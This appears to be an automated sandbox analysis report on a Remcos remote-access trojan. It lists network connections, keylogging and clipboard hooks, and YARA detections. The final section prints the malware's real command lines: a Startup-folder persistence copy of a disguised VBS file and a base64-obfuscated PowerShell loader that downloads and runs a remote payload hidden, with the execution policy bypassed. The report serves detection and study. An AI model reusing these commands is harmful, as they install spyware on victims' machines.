            Source: unknownNetwork traffic detected: HTTP traffic on port 55709 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55640
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55761
            Source: unknownNetwork traffic detected: HTTP traffic on port 55481 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55791 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55401 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55665 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56039 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55688 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55407
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55649
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55408
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55529
            Source: unknownNetwork traffic detected: HTTP traffic on port 55858 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55409
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55403
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55404
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55525
            Source: unknownNetwork traffic detected: HTTP traffic on port 55825 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55405
            Source: unknownNetwork traffic detected: HTTP traffic on port 55802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55406
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55641
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55762
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55400
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55642
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55763
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55401
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55764
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55402
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55765
            Source: unknownNetwork traffic detected: HTTP traffic on port 56026 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55650
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55771
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55530
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55772
            Source: unknownNetwork traffic detected: HTTP traffic on port 55482 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55572 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55870 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55790 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56040 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55423 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55418
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55539
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55419
            Source: unknownNetwork traffic detected: HTTP traffic on port 55836 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55414
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55656
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55777
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55415
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55778
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55416
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55537
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55779
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55417
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55538
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55410
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55531
            Source: unknownNetwork traffic detected: HTTP traffic on port 55618 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55773
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55411
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55532
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55412
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55533
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55413
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55897
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55780
            Source: unknownNetwork traffic detected: HTTP traffic on port 55459 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55781
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55540
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55420
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55541
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55783
            Source: unknownNetwork traffic detected: HTTP traffic on port 55847 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55550 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55516 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55629 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55829
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55709
            Source: unknownNetwork traffic detected: HTTP traffic on port 55422 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55704
            Source: unknownNetwork traffic detected: HTTP traffic on port 55720 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55825
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55826
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55706
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55948
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55707
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55949
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55700
            Source: unknownNetwork traffic detected: HTTP traffic on port 55525 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55701
            Source: unknownNetwork traffic detected: HTTP traffic on port 55800 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55822
            Source: unknownNetwork traffic detected: HTTP traffic on port 55548 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55702
            Source: unknownNetwork traffic detected: HTTP traffic on port 55823 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55823
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55703
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55824
            Source: unknownNetwork traffic detected: HTTP traffic on port 55619 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55949 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55620 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55792 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55719
            Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55836
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55716
            Source: unknownNetwork traffic detected: HTTP traffic on port 55834 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55717
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55838
            Source: unknownNetwork traffic detected: HTTP traffic on port 55471 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55718
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55839
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55711
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55712
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55833
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55713
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55834
            Source: unknownNetwork traffic detected: HTTP traffic on port 55781 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55710
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55831
            Source: unknownNetwork traffic detected: HTTP traffic on port 55460 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55411 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55757 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55514 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55609
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55605
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55847
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55968
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55849
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55608
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55601
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55602
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55603
            Source: unknownNetwork traffic detected: HTTP traffic on port 55780 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55604
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55967
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55720
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55841
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55842
            Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55758 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55421 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55687 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56013 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55494 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55858
            Source: unknownNetwork traffic detected: HTTP traffic on port 55857 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55859
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55618
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55619
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55613
            Source: unknownNetwork traffic detected: HTTP traffic on port 55801 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55855
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55857
            Source: unknownNetwork traffic detected: HTTP traffic on port 55631 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55850
            Source: unknownNetwork traffic detected: HTTP traffic on port 55410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55851
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55610
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55611
            Source: unknownNetwork traffic detected: HTTP traffic on port 55571 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55860
            Source: unknownNetwork traffic detected: HTTP traffic on port 55707 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55483 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55537 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55812 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55642 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55529 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55833 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55449 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55856 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55564 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55398 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55465
            Source: unknownNetwork traffic detected: HTTP traffic on port 55541 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55586
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55466
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55467
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55589
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55593
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55473
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55474
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55475
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55590
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55470
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55591
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55471
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55592
            Source: unknownNetwork traffic detected: HTTP traffic on port 55609 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55718 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55771 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55467 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55897 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55477
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55478
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55599
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55483
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55484
            Source: unknownNetwork traffic detected: HTTP traffic on port 55518 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55485
            Source: unknownNetwork traffic detected: HTTP traffic on port 55415 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55948 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55481
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55482
            Source: unknownNetwork traffic detected: HTTP traffic on port 55552 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55478 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55810 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55632 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55494
            Source: unknownNetwork traffic detected: HTTP traffic on port 55867 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55495
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55496
            Source: unknownNetwork traffic detected: HTTP traffic on port 55414 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55497
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55491
            Source: unknownNetwork traffic detected: HTTP traffic on port 55706 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55492
            Source: unknownNetwork traffic detected: HTTP traffic on port 55456 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55437 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55811 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55448 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55586 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55610 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55822 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55499
            Source: unknownNetwork traffic detected: HTTP traffic on port 55399 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55575 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55717 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55403 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55793 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 55772 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55429
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:49705 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:49706 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49718 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.5:55748 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to register a low level keyboard hook
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00409340 SetWindowsHookExA 0000000D,0040932C,0000000010_2_00409340
            Installs a global keyboard hook
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,10_2_0040A65A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00414EC1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_00414EC1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0040A65A OpenClipboard,GetClipboardData,CloseClipboard,10_2_0040A65A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_00409468 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,10_2_00409468

            E-Banking Fraud

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.AddInProcess32.exe.1587080.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3370133817.000000000323F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3365846362.0000000001568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTR
            Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

            Spam, unwanted Advertisements and Ransom Demands

            barindex
            Contains functionalty to change the wallpaper
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 10_2_0041A76C SystemParametersInfoW,10_2_0041A76C
            Source: chrome.exeProcess created: 50

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 8.2.powershell.exe.180e9fef678.1.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 8.2.powershell.exe.180e9fef678.1.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 0000000A.00000002.3359936190.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
            Source: 00000008.00000002.2350319452.00000180E9BA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: 00000008.00000002.2350319452.00000180E8AFF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 1396, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Source: Process Memory Space: powershell.exe PID: 7136, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: AddInProcess32.exe PID: 1988, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')Jump to behavior
